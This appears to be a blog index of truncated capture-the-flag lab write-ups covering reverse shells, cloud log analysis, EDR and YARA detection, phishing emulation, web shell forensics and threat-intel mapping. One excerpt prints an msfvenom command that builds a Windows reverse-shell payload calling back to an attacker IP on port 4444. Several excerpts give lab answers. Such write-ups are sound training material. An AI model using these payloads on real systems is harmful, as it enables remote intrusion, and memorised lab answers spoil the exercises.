Aleyna
Lab link. Questions 1. What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt. msfvenom -p windows/x64/shell_reverse_tcp LHOST=Your_IP LPORT=4444 -f powershell Let’s copy …
Lab link. Questions 1. What is the other activity made by the user glitch aside from the ListObject action? PutObject 2. What is the source IP related to the S3 bucket activities of the user glitch? 53.94.201.69 3. Based on the eventSource field, what AWS service generates the ConsoleLogin event? signin.amazonaws.com 4. When did the …
Lab link. Questions 1. What is the flag displayed in the popup window after the EDR detects the malware? We open powershell and go to the directory to run the YARA rule in the example. cd C:\Tools .\JingleBells.ps1 We go to the location of the MerryChristmas.exe file, execute it (by clicking on it twice) and …
Lab link. Questions 1. What is the flag discovered after navigating through the wishes? 2. What is the flag seen on the possible proof of sabotage?
Lab link. McSkidy suspects that an attacker simulated an intrusion using the T1566.001 Spearphishing with an attachment technique defined in the MITRE ATT&CK framework. We will recreate this attack and analyze the artifacts left behind. PowerShell Usage 1. Running the Help Command in PowerShell First, the Get-Help Invoke-AtomicTest command is run to get information about …
Lab link. Questions 1. BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php /media/images/rooms/shell.php 2. BLUE: What IP address accessed the web shell? 10.11.83.34 3. RED: What is the contents of the flag.txt? This command adds a line to the system’s /etc/hosts file. The added line associates the name frostypines.thm with the IP address …
Lab link. Questions 1. What is the name of the account causing all the failed login attempts? service_admin 2. How many failed logon attempts were observed? 6791 3. What is the IP address of Glitch? 10.0.255.1 4. When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS Dec 1, 2024 08:54:39.000 5. What …
Lab link. McSkidy tapped keys with a confident grin,A suspicious website, now where to begin?She’d seen sites like this, full of code and of grime,Shady domains, and breadcrumbs easy to find. We can visit the target IP address website through the browser. The site appears to be one that converts YouTube videos to MP3 or …
Apply threat intelligence to red team engagements and adversary emulation. Task 5: TTP Mapping 5.2. How many Command and Control techniques are employed by Carbanak? https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0008%2FG0008-enterprise-layer.json 2 5.3. What signed binary did Carbanak use for defense evasion? Rundll32 5.4. What Initial Access technique is employed by Carbanak? Valid Accounts Task 7: Creating a Threat Intel Driven Campaign …
Reveal how attackers can craft client-side credential-stealing webpages that evade detection by security tools. Lab link. Task 3: Email Headers 3.1. According to the IP address, what country is the sending email server associated with? We upload the .eml file to the Message Header Analyzer and find the Received IP address. Since the IP address location …